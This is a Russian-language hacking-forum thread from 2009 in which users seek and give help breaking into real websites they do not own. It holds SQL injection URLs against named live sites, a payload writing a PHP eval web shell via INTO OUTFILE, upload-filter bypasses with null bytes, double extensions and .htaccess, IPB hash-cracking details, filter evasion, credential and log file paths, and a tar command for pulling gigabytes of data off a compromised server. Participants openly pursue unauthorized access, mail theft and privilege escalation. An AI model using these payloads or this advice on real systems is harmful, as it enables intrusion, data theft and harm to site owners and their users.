Просмотр полной версии : Ваши вопросы по уязвимостям.
massovka
07.04.2009, 23:59
Sofiya::659a4ba8be228cf0d54db65a213cf1fe
вот один из примеров! А так как я новичек незнаю двойной или не двойной он кто подскажет тому спасибо
Ребята подскажите как это хэш
двойной или соленый чтоб я знал что делать дальше! А то инфа ыз сайта очень нужна
massovka
08.04.2009, 00:12
так откуда ты его взял?
З сайта над которым долблюсь уже 4 дня
База 5.0.45
Там куча юзеров, проверил чел 300 http://hash.insidepro.com/index.php?lang=eng ничего не дало ни одного стандартного пароля! Мне подсказали что или он двойной или селеный
какбэ надо знать от чего этот хеш. От форума или какой нить паблик ЦМС или от чего ещё. А так мы тебе не поможем никак. Тем более если он с солью, то тебе нужно её узнать
ph1l1ster
08.04.2009, 00:16
З сайта над которым долблюсь уже 4 дня
База 5.0.45
Там куча юзеров, проверил чел 300 http://hash.insidepro.com/index.php?lang=eng ничего не дало ни одного стандартного пароля! Мне подсказали что или он двойной или селеный
Да нафига нам твоя версия базы, у тебя уже по русски 2й раз спрашивают, откуда хэш??
какой форум? версия форума? ссылку давай!
massovka
08.04.2009, 00:17
какбэ надо знать от чего этот хеш. От форума или какой нить паблик ЦМС или от чего ещё. А так мы тебе не поможем никак. Тем более если он с солью, то тебе нужно её узнать
Сайт с базой фото форумом
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+80 2,1/*
версия СУБД (базы данных) - 5.0.45
ph1l1ster
08.04.2009, 00:19
3.14здец!!!!! извеняюсь :)
Забудь версию БД! Забудь!
Дай ссылку на форум.
massovka
08.04.2009, 00:22
3.14здец!!!!! извеняюсь :)
Забудь версию БД! Забудь!
Дай ссылку на форум.
Не злитесь! Все когда начинали:)
Кинул в личку
DimOnOID
08.04.2009, 00:24
Сайт с базой фото форумом
concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+80 2,1/*
версия СУБД (базы данных) - 5.0.45
Колонки
converge_pass_hash
converge_pass_salt
Таблица
ibf_members_converge
Алг
md5(md5($salt).md5($pass))
Именно из этого можно получить пароль пользователя..а не из member_login_key....в старых версиях IPB помнитца legacy_password хранил пасс в MD5
ILYAtirtir
08.04.2009, 00:25
там хэши соленные,подбирай хоть до посинения)
P.S. ibf_members вроде в куки подставляются
massovka
08.04.2009, 01:06
Колонки
converge_pass_hash
converge_pass_salt
Таблица
ibf_members_converge
Алг
md5(md5($salt).md5($pass))
Именно из этого можно получить пароль пользователя..а не из member_login_key....в старых версиях IPB помнитца legacy_password хранил пасс в MD5
Вот получил его 59ae8c9d0703794a37ac411ea0912316:YYrre
буду ломать СПАСИБО ВАМ
http://www.elitmebel-1md.ru/catalog/list/319'/
Помогите оборвать запрос...Он не коментируется...
Imperou$
08.04.2009, 19:58
Поимел доступ в админку на необходимом сайте.
Через аплоад картинок или файлов (pdf,doc) залить пытаюсь шелл-эррорит.
Пытаюсь залить как "shell.php%00.gif" предварительно засунув код шелла в гифку(гифка отображается нормально) -заливает удачно,но при переходе по адресу картинки "пишет 404 file not found".
Тоже самое и с .doc и с пдф.Есть какие либо другие варианты? Инклуд не нашёл =(
geezer.code
08.04.2009, 20:07
Поимел доступ в админку на необходимом сайте.
Через аплоад картинок или файлов (pdf,doc) залить пытаюсь шелл-эррорит.
Пытаюсь залить как "shell.php%00.gif" предварительно засунув код шелла в гифку(гифка отображается нормально) -заливает удачно,но при переходе по адресу картинки "пишет 404 file not found".
Тоже самое и с .doc и с пдф.Есть какие либо другие варианты? Инклуд не нашёл =(
1 если картинка отобразилась, значит никого null-байт не обманул, так что искать файл с расширением .php - бесполезно.
2 залить без LFI файл с неисполняемым(читай php php3 phtml) расширением - бесполезное дело, кроме .htaccess ;)
Imperou$
08.04.2009, 20:21
1 если картинка отобразилась, значит никого null-байт не обманул, так что искать файл с расширением .php - бесполезно.
2 залить без LFI файл с неисполняемым(читай php php3 phtml) расширением - бесполезное дело, кроме .htaccess ;)
1 Нет, картинка не отобразилась.Она просто локально на компе отображается нормально.Когда залита,то не отображается (image)-но когда перехожу по её адресу-not found.
2 .htaccess не могу тоже залить =(
Byrger, а где вы там скуль увидели или что то подобное.... вроде ничего такого нет... =\ я не нашел ничего
Imperou$,проверьте все еще раз может что то не так сделали или каталог неправильно нашли куда она льется.... попробуйте еще с расширением shell.doc.php или shell.pdf.php =) что больше нравиться, может прокатит
geezer.code
08.04.2009, 21:20
Byrger, а где вы там скуль увидели или что то подобное.... вроде ничего такого нет... =\ я не нашел ничего
случайно не Firefox3 пользуешься ?)) тема тут https://forum.antichat.ru/thread111019.html
попробуй оперой.
Люди,объясните мне следующую аномалию:
На сервере фильтруется запросы,в которых фигурирует,так или иначе,FROM.Но подзапрос с УЧАСТИЕМ FROM проходит нормально.Чего-то я явно не догоняю... Догадался,что фильтруется,ибо редиректит на sweb.ruхостинг данного сайта) с *антихакерским* сообщением.Смею предположить,что там вовсе не фильтруется FROM...пробовал изменять регистр,но не помогло.Пришлось посимвольно перебирать.Как можно ещё решить данную проблему, не имея исходников ? Ведь FROM фигурируется во всех запросах с выборкой из бд...
Krist_ALL
08.04.2009, 23:21
переведи запос к бд в hex. site.ru/index.php?id=-1+union+unhex(XXXXXXXXXXXXXXX)/*
где XXXXXXXXXXXXXXX - select ... from ... в hex
Jokester
08.04.2009, 23:30
переведи запос к бд в hex. site.ru/index.php?id=-1+union+unhex(XXXXXXXXXXXXXXX)/*
где XXXXXXXXXXXXXXX - select ... from ... в hex
Ты вот зачем это написал, дружище? ЭТО БРЕД
Велемир sweb фильтрует последовательность "union select from" тоесть все три оператора если присутствуют в запросе. Обходится POST если скрипт позволяет
Imperou$ Это конечно не моё дело, но форум мониторят турки постоянно на предмет админок и дефейсят сайты, а ты выложил админку от какого-то христианского сайта (я в португальском не силён, но помоему это так). Конечно его задефейсят, если увидят
Потом заливаю опять с тем же именем, НО! скрипт меняет glaz.php%00.gif на glaz.php%00_1.gif !!!
Это значит что нулевой не прокатил? Но так картинка то должна быть, если добавляется _1 ! почему интересно not found? Уже просто интересно.
Нуллбайт прокатывает только при magic quotes gpc = 0, что встречается крайние редко.
Скорее всего твоя гифка находится по адресу glaz.php%2500.gif
так как скрипт не срезал нул байт и передал файл с именем идентичным оригиналу т.е glaz.php%00.gif.
Imperou$
09.04.2009, 00:30
jokester
Да ну его нах... o_O
Потёр мессагу!
Я ничего против не имею, просто нужен доступ к другому сайту на серваке...А этот оказался бажный.Ничего личного =)
+StArT+
Да, ты прав, +
Одного не могу понять...
Почему именно glaz.php%2500.gif ?? Откуда 25?
massovka
09.04.2009, 00:46
Привет всем у меня такой вопрос помогите юзеру залить шел на форум IPB 2.1.2 получил доступ админа! но никогда еще не заливал
и 2 вопрос нашел такой запрос админа
old_adsess=9ff9edd3dd0f24903b5d60b8acb04d29&&member_id=1&password=ok
чем он может мне почь такой запрос
Imperou$
09.04.2009, 00:46
Привет всем у меня такой вопрос помогите юзеру залить шел на форум IPB 2.1.2 получил доступ админа! но никогда еще не заливал
http://forum.antichat.ru/thread23106-%C7%E0%EB%E8%E2%EA%E0+%F8%E5%EB%EB%E0.html
http://forum.antichat.ru/thread89112.html
massovka
09.04.2009, 01:26
http://forum.antichat.ru/thread23106-%C7%E0%EB%E8%E2%EA%E0+%F8%E5%EB%EB%E0.html
http://forum.antichat.ru/thread89112.html
Я конечно почитал! но тут нужно сидет разбыратся! У меня доступ к адмнке есть но боюсь что звтра по логам меня попалят вот думаю за ночь все слить! Можеть кто-то поможет линк дам в личку!?
А то неделю сервак мучал
Я конечно почитал! но тут нужно сидет разбыратся! У меня доступ к адмнке есть но боюсь что звтра по логам меня попалят вот думаю за ночь все слить! Можеть кто-то поможет линк дам в личку!?
А то неделю сервак мучал
угу, за неделю не спалили , а теперь спалят? :)
пробуй заюзать паблик сплоиты раз так срочно нужно.
Одного не могу понять...
Почему именно glaz.php%2500.gif ?? Откуда 25?
все просто "%25" = "%" в URL кодировке.
massovka
09.04.2009, 01:49
угу, за неделю не спалили , а теперь спалят? :)
пробуй заюзать паблик сплоиты раз так срочно нужно.
Ну я попал в админку а там логи что и кто делает! Прочитал что нужно залить шел через смайлики но низнаю где скачать этот шел! Ну и еще куча вопросов! Может удели 5 минут начинающему? ;)
https://forum.antichat.ru/printthread.php?t=21954&pp=40
там ТЕМ описывает как это делается по пунктам.
шел заливаешь этот например,
http://madnet.name/files/1/10.htm
качешь себе на комп, меняешь расширение на phtml
massovka
09.04.2009, 03:23
https://forum.antichat.ru/printthread.php?t=21954&pp=40
там ТЕМ описывает как это делается по пунктам.
шел заливаешь этот например,
http://madnet.name/files/1/10.htm
качешь себе на комп, меняешь расширение на phtml
Все получилось
navigat0r
09.04.2009, 12:42
имею IPB форум, залил шелл через стили изобразжений.При доступе выдаёт
You don't have permission to access /forum/style_images/autumn/test.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Как это перебороть, может где в админке настроить чё та надо?
DrAssault
09.04.2009, 12:57
имею IPB форум, залил шелл через стили изобразжений.При доступе выдаёт
You don't have permission to access /forum/style_images/autumn/test.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Как это перебороть, может где в админке настроить чё та надо?
имхо прав у тебя не хватает на чтение из вэб... jokester если я че то не правильно сказал, поправь...
navigat0r
09.04.2009, 13:17
имхо прав у тебя не хватает на чтение из вэб... jokester если я че то не правильно сказал, поправь...
что прав не хвататет, там же написано :) как можено одойти это??Вот что ты мне лучше скажи
massovka
09.04.2009, 14:16
Привет всем! Такой вопрос! Вчера залил на сервак шел! Все работает но нужно попасть в почтовые ящики которые есть прочитать всю почту! Админ поменял пароли на акаунты
! Есть доступ phpmyadmin и шелл! Как мне попасть в почтовый сервер? спасибо
ILYAtirtir
09.04.2009, 14:43
для начала написал бы какой почтовый сервис sendmail там итд,в базе поройся через майадмин мож че там есть
massovka
09.04.2009, 14:55
для начала написал бы какой почтовый сервис sendmail там итд,в базе поройся через майадмин мож че там есть
UebiMiau доступ в шелл есть начиная с папки public_html
FreeBSD 6.2
И еще я вот поюзал шелл а он токо на чтение а мне нужно пару файлов поменять :(
Pashkela
09.04.2009, 15:02
Никак, рутать сервак
ЗЫЖ На будущее, ты даже ось не написал, на которую шелл залил
laedafess
09.04.2009, 16:07
что прав не хвататет, там же написано :) как можено одойти это??Вот что ты мне лучше скажи
залить в эту папку .htaccess с текстом
Allow from all
AddType application/x-httpd-php .phpили лить шелл в другую папку.
Ну это общий случай, я хз как в ипб шелл лить
При заливке шелла возникает ошибка :
Can't call method "getBounds" on an undefined value at ../../MODULES/MWGD.pm line 40, <fh00001nedelya1x.jpg.cgi> line 87.
как я понял, это ошибка при проверки картинки... Можно ли как-то это ограничение обойти? И будет ли выполняться cgi-сценарий в папке site.gov/photos/
если все скрипты лежат в site.gov/cgi-bin/ ?
geezer.code
09.04.2009, 18:09
При заливке шелла возникает ошибка :
Can't call method "getBounds" on an undefined value at ../../MODULES/MWGD.pm line 40, <fh00001nedelya1x.jpg.cgi> line 87.
как я понял, это ошибка при проверки картинки... Можно ли как-то это ограничение обойти?
попробовать залить gif.
И будет ли выполняться cgi-сценарий в папке site.gov/photos/
если все скрипты лежат в site.gov/cgi-bin/ ?
нет, если это дополнительно не оговорено в .htaccess
ps если резюмировать 2 вопроса, то можно сказать что заливка шелла с неисполняемым расширением, без возможности залить свой .htaccess , или без LFI/code execution - занятие бесполезное.
massovka
09.04.2009, 19:33
Никто не подскажит PHP скрипт для работы с файлами! А то уже 2 заюзал никак не могу папку скачать она весить гиг прмерно! Виснет скрипт и все!
Что делать?
Никто не подскажит PHP скрипт для работы с файлами! А то уже 2 заюзал никак не могу папку скачать она весить гиг прмерно! Виснет скрипт и все!
Что делать?
заархивировать и скачать(накрайняк tar без сжатия).
massovka
09.04.2009, 19:45
заархивировать и скачать(накрайняк tar без сжатия).
А подскажите какой командой?
neverdie
09.04.2009, 19:53
народ, подскажьте плз как запускать скрипты например перловский niko просто я запускаю через свой компилятор и выдаёт ошибку на третьей линии просто я не могу найти админку одного сайта, юзал телепорт про не помогло....
neverdie проблема не в твоем компиляторе, а ая думаю в самом скрипте..
http://www.photodom.com/catalog.php?page=2&id=17,117)+union+select+1%23&page025=&action=
нету вывода чтоли? пятая ветка..
ph1l1ster
09.04.2009, 21:05
нету вывода чтоли? пятая ветка..
так
http://www.photodom.com/catalog.php?page=2&id=17,117)+and+ascii(lower(substring((SELECT+login +from+users+LIMIT+1),1,1)))%3E1%23&page025=&action=
с пасами лень искать
geezer.code
09.04.2009, 21:10
народ, подскажьте плз как запускать скрипты например перловский niko просто я запускаю через свой компилятор и выдаёт ошибку на третьей линии просто я не могу найти админку одного сайта, юзал телепорт про не помогло....
какая ошибка? случайно не связана с https?
если так и при этом тебя этот протокол не интересует, то нужно эту строку закомментировать или удалить.
laedafess
09.04.2009, 21:37
нету вывода чтоли? пятая ветка..
http://www.photodom.com/fullscreen.php?fotoid=-1291553+union+select+1,2,3,4,5,6,7,8,9,0,concat(%2 7%22%3E%3Ch1%3E%27,version()),2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0,1,2,3+--
Всем приятного времени суток
хочу залить на сайт шелл , а kak это сделать не знаю вообще .
мост , где то можно про это почитать или объясните на пальцах , луче наверно в личку уже тогда.
В общем такая ситуация: на сервере на многих сайтах скуль иньекции, есть доступ к нескольким админкам, шелл через них не получаеццо залить, на одном поддомене бд запущена от имени root, file_priv - Y, пороли из mysql.user есть, пробовал читать разные конфиги - не читаются, тока получается etc/passwd....shadow тоже не читается, что странно ведь бд запущена от рута. По ssh ни один из добытых пассов не подошел(. Подкиньте пожалуйста свежую идейку...
на серве есть(взял из passwd):
Secure FTP
Novell Customer Center
PostgreSQL Server
OpenLDAP
SSH
Может можно прочитать логи подключения по фтп или ssh, подкиньте стандартные пути плз..
и еще кофе заканчиваеццо(
Pashkela
09.04.2009, 22:12
https://forum.antichat.ru/thread49775.html
2 Pashkela именно от туда и брал пути....там нет от Secure FTP и ССШ..
Pashkela
09.04.2009, 22:20
http://vsftpd.beasts.org/
vsftpd:
*log
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
*conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers
ssh:
/var/log/auth.log
Jokester
09.04.2009, 22:25
fker
1 Если маджик квот офф, зачем тебе конфиги? ищи папку на запись и лей шелл. Даже если ON залить можно при двойном запросе.
2 Ищи Phpmyadmin и лей через него, если база под рутом, то пасс думаю вытащишь от неё
shadow тоже не читается, что странно ведь бд запущена от рута
Это не тот рут, ничего странного :)
DimOnOID
09.04.2009, 22:28
В общем такая ситуация: на сервере на многих сайтах скуль иньекции, есть доступ к нескольким админкам, шелл через них не получаеццо залить, на одном поддомене бд запущена от имени root, file_priv - Y, пороли из mysql.user есть, пробовал читать разные конфиги - не читаются, тока получается etc/passwd....shadow тоже не читается, что странно ведь бд запущена от рута. По ssh ни один из добытых пассов не подошел(. Подкиньте пожалуйста свежую идейку...
на серве есть(взял из passwd):
Secure FTP
Novell Customer Center
PostgreSQL Server
OpenLDAP
SSH
Может можно прочитать логи подключения по фтп или ssh, подкиньте стандартные пути плз..
и еще кофе заканчиваеццо(
Исчи phpmyadmin или конекться на 3306 порт-если открыт..и лей шелл где FILE PRIV Y-если ты говоришь что пароли у тебя есть...А НЕ ХЕШИ..
И почему ты думаешь что если в мускуле лазишь под логином рута ...должен читаться /etc/shadow?
Дириктории на запись то есть, а вот полных путей нет, magic quots - off...
именно пароли есть..
а подключение эт хорошая мысль, сейчас попробую, хотя для удаленных пользователей может быть закрыто..
Jokester
09.04.2009, 22:40
Дириктории на запись то есть, а вот полных путей нет, magic quots - off...
гугл
warning or error site:ТВОЙ_САЙТ
если сайтов несколько, то все прочекай, частенько помогает.
massovka
09.04.2009, 22:45
Никто не подскажит PHP скрипт для работы с файлами! А то уже 2 заюзал никак не могу папку скачать она весить гиг прмерно! Виснет скрипт и все!
Что делать?
Юзаю скрипт nsTView v2.1 питаюсь зайти в папку где много фалов виснеть все! С другими папками проблем нет
гугл
warning or error site:ТВОЙ_САЙТ
Найс, спасибо, отличная кверь пару инклудов еще нашел))
Как можно попробовать залить ПХП шелл если проходят файлы только с расширение gif и jpg?
И возможно ли через SQL-inj залить фаил?
Попробуй расширение shell.jpg.php или в кртинку вставить код
Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна запись..
https://forum.antichat.ru/thread43966.html
2.2.1 Запись в файл
Есть в MYSQL такая интересная функция типа SELECT … INTO OUTFILE позволяющая записывать информацию в файл. Либо такая конструкция SELECT ... INTO DUMPFILE они почти похоже и можно использовать любую.
Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; --
Для нее работает несколько ограничений.
Запрещенно перезаписывание файлов
Требуются привилегии типа FILE
(!)Обязательны настоящие кывычки в указании имени файла
А вот что бы нам мешало сделать веб шел? Вот например так:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
Попробуй расширение shell.jpg.php или в кртинку вставить код
Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна
.......
можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается :D
DrAssault
10.04.2009, 15:30
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается :D
Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
DimOnOID
10.04.2009, 15:38
Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
Да ты что?Как ты хексе то подставишь?...как подставишь в кесе так он и запишит в хексе..
Имею страницу:
site.ru/magazine/tapki.html
Если подставить /tapki'.html - то вылазиет
Warning: Wrong parameter count for mysql_result() in D:\host\magazine\index.php on line 26
Если подставить просто /tapki' то ничего неслучиться,идет проверка на расширение :(
Так вот,возможноли раскрутить? Так ака это мой первый опыт проведения SQL-inj то пожалуйста поподробнее.ЗАрание спасибо.
DrAssault
10.04.2009, 15:51
Да ты что?Как ты хексе то подставишь?...как подставишь в кесе так он и запишит в хексе..
Не надо кричать!!! Тебе пример привести чтоли??? Я не говорю про пути!!! Где ты в пути видел знаки () и <> у???
Имею страницу:
site.ru/magazine/tapki.html
Если подставить /tapki'.html - то вылазиет
Warning: Wrong parameter count for mysql_result() in D:\host\magazine\index.php on line 26
Если подставить просто /tapki' то ничего неслучиться,идет проверка на расширение
Так вот,возможноли раскрутить? Так ака это мой первый опыт проведения SQL-inj то пожалуйста поподробнее.ЗАрание спасибо.
Можно конечно, крутится как обычная скуля, вот пример тебе:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),dat abase(),version()),25,26,27,28,29,30,31,32,33,34.h tml
Источник: http://www.karabas.info/
Не надо кричать!!! Тебе пример привести чтоли??? Я не говорю про пути!!! Где ты в пути видел знаки () и <> у???
Можно конечно, крутится как обычная скуля, вот пример тебе:
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),dat abase(),version()),25,26,27,28,29,30,31,32,33,34.h tml
Источник: http://www.karabas.info/
GПопобывал прямо твой пример - эфекта ноль,но я так понимаю это изза количества столбцов :(
Где можно почитать хороший,доступный ман по этому делу..?
Можно ли узнать пасс от phpMyAdmin 2.9.2 ?
mailbrush
10.04.2009, 16:01
m0Hze, там уже прикрыли скулю...
http://forum.antichat.ru/thread43966.html - читай
m0Hze, там уже прикрыли скулю...
http://forum.antichat.ru/thread43966.html - читай
ДА нет,ошибка выоазиет,просто это магазин моего провайдера,так сказать электронный,и там кое что для меня интересное лежит.Хочеться пробраться.
mailbrush
10.04.2009, 16:03
Можно ли узнать пасс от phpMyAdmin 2.9.2 ?Если есть скуля пятой ветки, можно с таблицы mysql.user
mailbrush
Я хз какая скуля у него. Знаю что версия pma 2.9.2 у чела.
mailbrush
10.04.2009, 16:05
ДА нет,ошибка выоазиет,просто это магазин моего провайдера,так сказать электронный,и там кое что для меня интересное лежит.Хочеться пробраться.
Эту скулю нашёл я. Сообщил авторам сайта. Они прикрыли, и вывели сообщение, типо ты кулхакер, но это не ошибка мускуля, т.к. автор говорил, что переданные данные в этом скрипте фильтруются (только числа).
Эту скулю нашёл я. Сообщил авторам сайта. Они прикрыли, и вывели сообщение, типо ты кулхакер, но это не ошибка мускуля, т.к. автор говорил, что переданные данные в этом скрипте фильтруются (только числа).
Я тебя вообще непониаю,какое отношение это иеет ко не? оО
В обще почитав статейку, сработала коанда с коентарием, -- , сижу подбираю столбцы.
Если интересно,то сайт воть: http://www.j-mag.ru/games/item/avtofeny_zaryazhennye_sk%27orostyu.html, но я незнаю как урутить с фореачем,а точнее никак походу,а т часть где идет ускл_еррор, невидно из внехи, это Личный кабинет,воть.
Imperou$
10.04.2009, 16:16
Приветствую.Ребят, извините если не в ту тему пишу...
В общем такая ситуация-немогу настроить скрипт от Elekt'a на one simvol brut
Одни звездочки вместо ascii символов, хотя руками через подзапросы я подобрал пару первых таблиц.Но все перебрать физически не смогу.Да и скрипт на перле, что для меня крайне неудобно.
Посоветуйте какой нибудь php скрипт корректно работающий для подобных целей.Если такой имеется конечно, (уверен что должен быть).SIPT ни третий ни четвёртый не берёт так же...
Далее
Имеется сайт, 5-ая ветка, пробую сдампить скриптом-пустые поля =( Хотя скрипт другие сайты дампит корректно.И хексил уже, и с конкатом игрался, и с кодировкой (на неё грешил) и latin1 ставил и binary...Что только в общем не делал.Хотя если руками выводить, то просто concat_ws(0x3A3a,table_schema,table_name,column_na me) выводит нормально на сайте.Но вот скрипт не берёт...SIPT так же не тянет, ни третий ни четвёртый.Версию выводит, юзера, database.А вот дампить-нивкакую.
ПОМОГИТЕ! =)
Хотелось бы тоже корректно работающий скриптик.Или если есть желание-в лс, поковыряемся вместе...
massovka
10.04.2009, 16:54
Привет всем есть доступ на сервак shell есть доступ phpAdmin! Нужно узнать пароль на фтп как это можно сделать? брутит не охота там 14 символов! phpAdmin(могу поменять пароль админа на свой) но не охота палится!
Кто поможет?
DrAssault
10.04.2009, 17:03
Привет всем есть доступ на сервак shell есть доступ phpAdmin! Нужно узнать пароль на фтп как это можно сделать? брутит не охота там 14 символов! phpAdmin(могу поменять пароль админа на свой) но не охота палится!
Кто поможет?
Как вариант поройся в базе, частенько пассы от фтп хранят именно в БД...
Или как вариант поищи passwd на сервере. Сделай юзер лист с списком всех юзеров в passwd. Потом бери фтп брутофорсер, который использует юзер листы. Запускай его указывая user.txt куда мы вписали всех юзверей... по другому имхо никак... ну или троя админу и все дела)))
massovka
10.04.2009, 17:07
Как вариант поройся в базе, частенько пассы от фтп хранят именно в БД...
Или как вариант поищи passwd на сервере. Сделай юзер лист с списком всех юзеров в passwd. Потом бери фтп брутофорсер, который использует юзер листы. Запускай его указывая user.txt куда мы вписали всех юзверей... по другому имхо никак... ну или троя админу и все дела)))
Я посмотрел всю базу! ничего про ftp нет! Просто у мне отуда нужно скачать папку 2гига когда пытаюсь ее в sheel открыть виснеть! Может как-то можно поднять свои права в shell?
Юзаю nsT View v2.1
DrAssault
10.04.2009, 17:10
Я посмотрел всю базу! ничего про ftp нет! Просто у мне отуда нужно скачать папку 2гига когда пытаюсь ее в sheel открыть виснеть! Может как-то можно поднять свои права в shell?
Юзаю nsT View v2.1
Так если шелл есть, в чем проблема? Поднимай права и вперед с песней...
massovka
10.04.2009, 17:13
Так если шелл есть, в чем проблема? Поднимай права и вперед с песней...
Ну шел только на чтение! А так как поднять права я новичек! Так что если подскажите буду рад
Imperou$
10.04.2009, 17:19
Сожми папку коммандой
tar -czvf file.tar.gz /полный/путь/к/папке/
Выполняй эту комманду из папки, доступной для записи.
И качай архив file.tar.gz.Сожмётся нормально.
По поводу поднятия прав-я тебе в пм написал.
massovka
10.04.2009, 17:24
Сожми папку коммандой
tar -czvf file.tar.gz /полный/путь/к/папке/
Выполняй эту комманду из папки, доступной для записи.
И качай архив file.tar.gz.Сожмётся нормально.
По поводу поднятия прав-я тебе в пм написал.
Спасибо ща попробую сделать!
Imperou$
10.04.2009, 17:28
Если не получится скачать через шелл, просто укажи путь к созданному архиву в адресной строке браузера, вместо адреса шелла.
massovka
10.04.2009, 18:02
Ну запустил что-то думает долго посмотрим через мин 10 а как долго папку 2-3гига архивит?
Все получилось спасибо
massovka
10.04.2009, 23:45
Добрый вечер! Кто знает как получить root на сервере
FreeBSD 6.2-RELEASE
/usr/bin/gcc
id=1004(apache) gid=1003(apache) groups=1003(apache)
есть shell и такая инфа
mailbrush
10.04.2009, 23:58
http://www.securitylab.ru/poc/extra/370448.php
massovka
11.04.2009, 00:07
http://www.securitylab.ru/poc/extra/370448.php
там же вроди написанно что подверсию FreeBSD 7.0 и как мне запустить его есть sell на сервере! я просто начинающий в этом деле
Killer-App
11.04.2009, 02:23
На сайте Geometria.ru(http://stav.geometria.ru/index.php?show=user&user=280106&action=topic) Увидел такую ошибку:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by id desc' at line 1
Можно ли как нибудь это использовать. В SQL не разбираюсь, вот хотелось бы на конкретном примере начать (так сказать HOWTO проведите, куда копать и что можно сделать используя данную ошибку)
Killer-App, эта ошибка вызвана не вами, соответственно влиять на запрос вы не можете... =\ тут инъекта не будет =)
А почитать про SQL-inj можно:
тут (https://forum.antichat.ru/thread43966.html)
или
тут (https://forum.antichat.ru/thread19844.html)
mailbrush, человек же написал что у него FreeBSD 6.2-RELEASE зачем давать эксплоит который для FreeBSD >= 7.0 local kernel root exploit =)?
massovka, это скорее всего не порутаешь... хотя может быть я чего то не знаю...
ILYAtirtir
11.04.2009, 10:07
Killer-App
Или не парься,вот (http://forum.antichat.ru/showthread.php?p=1209388#post1209388) раскрученная мною скуля,там все написано.
massovka
11.04.2009, 12:25
Добрый вечер! Кто знает как получить root на сервере
FreeBSD 6.2-RELEASE
/usr/bin/gcc
id=1004(apache) gid=1003(apache) groups=1003(apache)
есть shell и такая инфа
Товарищи ну кто мне поможет ;) ;) ;) ;)
ph1l1ster
11.04.2009, 12:46
massovka,
http://www.google.ru/search?q=FreeBSD+6.2-RELEASE++local+root+exploit
http://www.google.ru/search?q=%EF%EE%EB%F3%F7%E5%ED%E8%E5+root+freebsd
massovka
11.04.2009, 12:54
massovka,
http://www.google.ru/search?q=FreeBSD+6.2-RELEASE++local+root+exploit
http://www.google.ru/search?q=%EF%EE%EB%F3%F7%E5%ED%E8%E5+root+freebsd
Так я искал и так понял что под 6.2 ничего нет :rolleyes: :rolleyes:
ph1l1ster
11.04.2009, 13:00
Так я искал и так понял что под 6.2 ничего нет :rolleyes: :rolleyes:
Хватит уже тупить! Пробуй под другие версии 6.x
5+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.COLUMNS+WHERE+TABLE_NAME='users')--
0_о
5+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ S CHEMA.COLUMNS+WHERE+TABLE_NAME='users')--
мда, по-моему пора предупреждать за глупые ответы на скорую руку (ph1l1ster, mailbrush, DrAssault) и вопросы, причина которым невнимательность (Byrger)
DrAssault
11.04.2009, 16:24
']
мда, по-моему пора предупреждать за глупые ответы на скорую руку (ph1l1ster, mailbrush, DrAssault) и вопросы, причина которым невнимательность (Byrger)
Ответы возможно и на скорую руку, но никак не глупые...
непонятка с XSS
---------------------
решил на досуге почитать что это такое.
Прочитал статью чуть выше. Нашел в сети левый сайтик, проверил у него поля ввода аватары на "><script>alert('XSS')</script>, окошко вылетло, радости полные штаны. Сразуже решил удостовериться, попросил знагомого зайти знакомого по сылке (на которой у меня по прежнему вылетает это окошко), знакомый перешл сказал нече нету. Я попросил скинуть код страницы, сделал поиск по XSS, нашел свой скрипт, но он был он был такой
<script>alert('МЮ ЯЮИРЕ НАМЮПСФЕМЮ XSS СЪГБХЛНЯРЭ')</script>
открыл у себя этуже страницу (опять вылетало окошко) посматрел код страницы у меня было написано так как и предпологалось
<script>alert('на сайте обнаружена XSS уязвимость')</script>"
собсно вопрос, а почему у меня нефильтруеться а у других фильтруеться ?
также делал проферку фильтра, на спец знаки, тут он и у меня отфильтровал нормально " и <> и еще чета.
Так почемуж у меня все равно экошко скрипта вылазиет непонятно
Не совсем моя тема...
Но могу предположить, что многое еще зависит от браузера, под которым чел переходит по ссыли...
Под Internet Explorer (по моему начиная с 7 версии), пассивная XSS не робит....
да нет, с оперы было дело, да я и сам с другого ака проверил, и результат был как и другана, тобишь для всех других идет фильтрация и для моего акка нет.
но нече, если неидет гара к магомеду, магомед взарвет ее :) через тоже поле сделал другоую весьч, теперь все работает :)
------------
